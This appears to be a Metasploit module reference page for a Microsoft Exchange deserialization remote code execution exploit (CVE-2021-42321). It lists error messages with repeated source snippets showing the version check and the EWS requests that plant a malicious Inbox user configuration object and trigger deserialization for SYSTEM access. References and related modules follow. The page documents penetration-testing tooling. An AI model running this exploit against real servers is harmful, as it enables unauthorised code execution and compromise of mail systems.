197: build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]
198: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
199: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
200: else
201: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
202: end
203: end
204:
Exchange Server <BUILD> is not a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is not a vulnerable build." error message:
196: if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/
197: build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]
198: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
199: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
200: else
201: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
202: end
203: end
204:
205: # Finally, try a variation on the above and use a well known trick of grabbing /owa/auth/logon.aspx
206: # to get a partial version number, then use the URL at /ecp/<version here>/exporttool/. If we get a 200
Range provided is not iterable
Here is a relevant code snippet related to the "Range provided is not iterable" error message:
210: # canonical_segments to make this close to the Rex::Version code format. Also for noticing that
211: # version_range is a Rex::Version object already and cleaning up some of my original code to simplify
212: # things on this premise.
213:
214: vuln_builds.each do |version_range|
215: return CheckCode::Unknown('Range provided is not iterable') unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2]
216:
217: prepend_range = version_range[0].canonical_segments[0..-2]
218: lowest_patch = version_range[0].canonical_segments.last
219: while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]
220: res = send_request_cgi(
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
220: res = send_request_cgi(
221: 'method' => 'GET',
222: 'uri' => normalize_uri(target_uri.path, "/ecp/#{build}/exporttool/")
223: )
224: unless res
225: return CheckCode::Unknown('Target did not respond to check.')
226: end
227: if res && res.code == 200
228: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
229: end
230:
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
223: )
224: unless res
225: return CheckCode::Unknown('Target did not respond to check.')
226: end
227: if res && res.code == 200
228: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
229: end
230:
231: lowest_patch += 1
232: end
233:
Could not determine the build number of the target Exchange Server.
Here is a relevant code snippet related to the "Could not determine the build number of the target Exchange Server." error message:
229: end
230:
231: lowest_patch += 1
232: end
233:
234: CheckCode::Unknown('Could not determine the build number of the target Exchange Server.')
235: end
236: end
237:
238: def exploit
239: case target['Type']
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
276: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
277: 'data' => xml_getfolder_inbox,
278: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
279: }
280: )
281: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
282:
283: unless res&.body
284: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
285: end
286:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
279: }
280: )
281: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
282:
283: unless res&.body
284: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
285: end
286:
287: xml_getfolder = res.get_xml_document
288: xml_getfolder.remove_namespaces!
289: xml_tag = xml_getfolder.xpath('//FolderId')
Response obtained but no FolderId element was found within it!
Here is a relevant code snippet related to the "Response obtained but no FolderId element was found within it!" error message:
286:
287: xml_getfolder = res.get_xml_document
288: xml_getfolder.remove_namespaces!
289: xml_tag = xml_getfolder.xpath('//FolderId')
290: if xml_tag.empty?
291: fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')
292: end
293: unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')
294: fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')
295: end
296: change_key_val = xml_tag.attribute('ChangeKey').value
Response obtained without expected Id and ChangeKey elements!
Here is a relevant code snippet related to the "Response obtained without expected Id and ChangeKey elements!" error message:
289: xml_tag = xml_getfolder.xpath('//FolderId')
290: if xml_tag.empty?
291: fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')
292: end
293: unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')
294: fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')
295: end
296: change_key_val = xml_tag.attribute('ChangeKey').value
297: folder_id_val = xml_tag.attribute('Id').value
298: print_good("ChangeKey value for Inbox folder is #{change_key_val}")
299: print_good("ID value for Inbox folder is #{folder_id_val}")
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
320: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
321: 'data' => xml_delete_inbox_user_config,
322: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
323: }
324: )
325: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
326:
327: unless res&.body
328: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
329: end
330:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
323: }
324: )
325: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
326:
327: unless res&.body
328: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
329: end
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
Success
Here is a relevant code snippet related to the "Success" error message:
326:
327: unless res&.body
328: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
329: end
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
334: print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')
335: print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')
336: end
Was not able to successfully delete the existing user configuration on the Inbox folder!
Here is a relevant code snippet related to the "Was not able to successfully delete the existing user configuration on the Inbox folder!" error message:
329: end
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
334: print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')
335: print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')
336: end
337:
338: # Now to replace the deleted user configuration object with our own user configuration object.
339: print_status('Creating the malicious user configuration object on the Inbox folder!')
Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!
Here is a relevant code snippet related to the "Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!" error message:
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
334: print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')
335: print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')
336: end
337:
338: # Now to replace the deleted user configuration object with our own user configuration object.
339: print_status('Creating the malicious user configuration object on the Inbox folder!')
340:
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
384: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
385: 'data' => xml_malicious_user_config,
386: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
387: }
388: )
389: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
390:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
387: }
388: )
389: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
390:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
395: unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}
396: fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')
397: end
Success
Here is a relevant code snippet related to the "Success" error message:
390:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
395: unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}
396: fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')
397: end
398:
399: print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')
400:
Was not able to successfully create the malicious user configuration on the Inbox folder!
Here is a relevant code snippet related to the "Was not able to successfully create the malicious user configuration on the Inbox folder!" error message:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
395: unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}
396: fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')
397: end
398:
399: print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')
400:
401: # Deserialize our object. If all goes well, you should now have SYSTEM :)
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
423: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
424: 'data' => xml_get_client_access_token,
425: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
426: }
427: )
428: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
429:
430: unless res&.body
431: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
432: end
433:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
426: }
427: )
428: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
429:
430: unless res&.body
431: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
432: end
433:
434: unless res.body =~ %r{<e:Message xmlns:e="http://schemas.microsoft.com/exchange/services/2006/errors">An internal server error occurred. The operation failed.</e:Message>}
435: fail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!')
436: end
Did not recieve the expected internal server error upon deserialization!
Here is a relevant code snippet related to the "Did not recieve the expected internal server error upon deserialization!" error message:
428: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
429:
430: unless res&.body
431: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
432: end
433:
434: unless res.body =~ %r{<e:Message xmlns:e="http://schemas.microsoft.com/exchange/services/2006/errors">An internal server error occurred. The operation failed.</e:Message>}
435: fail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!')
436: end
437: end
438: end
Go back to menu.
Related Pull Requests
- #16294 Merged Pull Request: Msf::Payload::Apk: Replace jarsigner with apksigner
- #16288 Merged Pull Request: Msf::Payload::Apk: raise if apktool output includes Java exceptions
- #16292 Merged Pull Request: Fix typo in document of cve_2021_4034
- #16283 Merged Pull Request: Msf::Payload::Apk: raise if APK is unsigned or generating new key fails
- #16258 Merged Pull Request: Improve TLV Type handling
- #16135 Merged Pull Request: Add setg sessiontlvlogging command to log TLV packets
- #16268 Merged Pull Request: Update check comhijack
- #16141 Merged Pull Request: Add service manager commands to msfconsle
- #16179 Merged Pull Request: Update Meterpreter file existence tests for CI environments
- #16162 Merged Pull Request: Add explicit Github action permissions
- #16145 Merged Pull Request: Fix to_handler case sensitivity issue
- #16269 Merged Pull Request: Msf::Payload::Apk: Check Java is installed and apktool.jar exists
- #16270 Merged Pull Request: Msf::Payload::Apk: raise if keytool cannot parse APK file or certificate
- #16219 Merged Pull Request: Convert core enumextcmd & loadlib commands to human readable strings
- #16153 Merged Pull Request: Read full response on smtp send/recv
- #16265 Merged Pull Request: Fix race condition in jobs cleanup that could allow it to clean up twice simultaneously
- #16245 Merged Pull Request: pfSense Authenticated File Write (CVE-2021-41282)
References
- CVE-2021-42321
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321
- https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7
- https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169
- https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
- https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
See Also
Check also the following modules related to this module:
- exploit/windows/http/exchange_chainedserializationbinder_rce
- exploit/windows/http/exchange_ecp_dlp_policy
- exploit/windows/http/exchange_ecp_viewstate
- exploit/windows/http/exchange_proxylogon_rce
- exploit/windows/http/exchange_proxynotshell_rce
- exploit/windows/http/exchange_proxyshell_rce
- auxiliary/gather/exchange_proxylogon_collector
- auxiliary/scanner/http/exchange_proxylogon
- auxiliary/scanner/http/exchange_web_server_pushsubscription
- auxiliary/scanner/msmail/exchange_enum
- exploit/windows/smtp/ms03_046_exchange2000_xexch50
- exploit/windows/ssh/freeftpd_key_exchange
- exploit/windows/ssh/freesshd_key_exchange
- auxiliary/dos/windows/smtp/ms06_019_exchange
- auxiliary/dos/windows/ssh/sysax_sshd_kexchange
- post/windows/gather/exchange
- exploit/windows/http/advantech_iview_unauth_rce
- exploit/windows/http/cayin_xpost_sql_rce
- exploit/windows/http/dlink_central_wifimanager_rce
- exploit/windows/http/dnn_cookie_deserialization_rce
- exploit/windows/http/geutebrueck_gcore_x64_rce_bo
- exploit/windows/http/git_lfs_rce
- exploit/windows/http/gitstack_rce
- exploit/windows/http/manageengine_adshacluster_rce
- exploit/windows/http/manage_engine_opmanager_rce
- exploit/windows/http/mcafee_epolicy_source
- exploit/windows/http/netgear_nms_rce
- exploit/windows/http/nscp_authenticated_rce
- exploit/windows/http/plex_unpickle_dict_rce
- exploit/windows/http/prtg_authenticated_rce
- exploit/windows/http/sepm_auth_bypass_rce
- exploit/windows/http/zentao_pro_rce
- exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
Related Nessus plugins:
- Security Updates for Exchange (November 2021)
- Security Updates for Exchange (November 2021) (Remote)
Authors
- pwnforsp
- zcgonvh
- Microsoft Threat Intelligence Center
- Microsoft Security Response Center
- peterjson
- testanull
- Grant Willcox
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.